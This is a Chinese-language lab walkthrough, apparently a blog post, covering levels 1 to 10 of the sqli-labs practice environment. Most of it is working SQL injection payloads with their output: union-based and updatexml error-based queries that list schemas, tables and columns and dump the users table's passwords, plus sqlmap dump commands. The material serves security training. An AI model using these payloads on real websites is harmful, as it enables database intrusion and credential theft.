-
1-4 关为联合查询
-
又回显 使用联合查询 其中的数据库 information 是MySQL自带的数据库信息可以知道所有库,表,列信息
-
使用 \ 判断出 闭合符合
- http://127.0.0.1/sqllabs/Less-4/?id=1 \
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1 \") LIMIT 0,1' at line 1 (比如这个闭合符号就是 “) )
- http://127.0.0.1/sqllabs/Less-4/?id=1 \
-
判断 数据库的列数
- http://127.0.0.1/sqllabs/Less-4/?id=1 ") order by 4 --+
- Unknown column '4' in 'order clause'
- http://127.0.0.1/sqllabs/Less-4/?id=1 ") order by 3 --+
- Your Login name:Dumb Your Password:Dumb
- http://127.0.0.1/sqllabs/Less-4/?id=1 ") order by 4 --+
-
联合查询判断回显位置
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,2,3 --+
- Your Login name:2 Your Password:3
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,database(),version() --+
- Your Login name:security Your Password:5.7.26
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,2,3 --+
-
查询数据库
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(schema_name) from information_schema.schemata),version() --+
- name:information_schema,challenges,dvwa,mysql,performance_schema,security,sys,yuji Your Password:5.7.26
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(schema_name) from information_schema.schemata),version() --+
-
查询表
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),version() --+
- 此方法 省去查询数据库 但是 前提为 dataabse() 未被禁用
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),version() --+
- Your Login name:emails,referers,uagents,users Your Password:5.7.26
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),version() --+
-
查询列
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),version() --+
- Your Login name:id,username,password Your Password:5.7.26
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),version() --+
-
查询数据
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(username,0x7e,password) from security.users),version() --+
- Your Login name:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
- http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(username,0x7e,password) from security.users),version() --+
-
-
5-6关为报错注入
-
有报错回显 ,使用报错注入
-
找到注入点 使用 \ 转义也可以
-
使用报错函数 updatexml (报错注入点在第二个位置)
- http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select user()),1) --+
- XPATH syntax error: '@localhost'
- http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select user()),1) --+
-
报错 显示 表
- http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema ='security'
- XPATH syntax error: ',referers,uagents,users'
- http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema ='security'
-
报错 显示 列
- http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema ='security' and table_name='users' ),1) --+
- XPATH syntax error: ',username,password
- http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema ='security' and table_name='users' ),1) --+
-
报错 显示 数据
- http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select group_concat(username,0x7e,password) from security.users ),1) --+
- 显示不全 因为 updataxml只显示 3位字节
- XPATH syntax error: '~Dumb0x7eDumb,Angelina0x7eI-kill'
- http://127.0.0.1/sqllabs/Less-6/?id=1" and updatexml(1,concat(0x7e,mid((select group_concat(username,'0x7e',password) from security.users),1,31)),1) --+
- http://127.0.0.1/sqllabs/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(username,'0x7e',password) from security.users),1,31)),1) --+
- 分段显示数据所在位置
- http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select group_concat(username,0x7e,password) from security.users ),1) --+
-
-
7-10 使用 sql注入工具 sqlmap
-
也可以使用盲注来实现
-
爆破数据库名称
- sqlmap -u "http://192.168.124.78/sqllabs/Less-8/?id=1" -dbs --batch
-
爆破数据表
- sqlmap -u "http://192.168.124.78/sqllabs/Less-8/?id=1" -D 'security' -tables --batch
-
爆破列
- sqlmap -u "http://192.168.124.78/sqllabs/Less-8/?id=1" -D 'security' -T 'users' -columns --batch
-
爆破数据
- sqlmap -u "http://192.168.124.78/sqllabs/Less-8/?id=1" -D 'security' -T 'users' -C'username,password' --batch --dump
-
-
使用sqlmap 注入sqllabs时候 需要使用本机 IP地址来实现注入 (sqlmap爆破SQL labs出现的问题)
- testing connection to the target URL
- [CRITICAL] unable to connect to the target URL ('Connection refused'). sqlmap is going to retry the request(s)
- [ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) by using higher verbosity levels
- 记得点赞关注哦 有问题 发布评论区一起探讨吧 w_w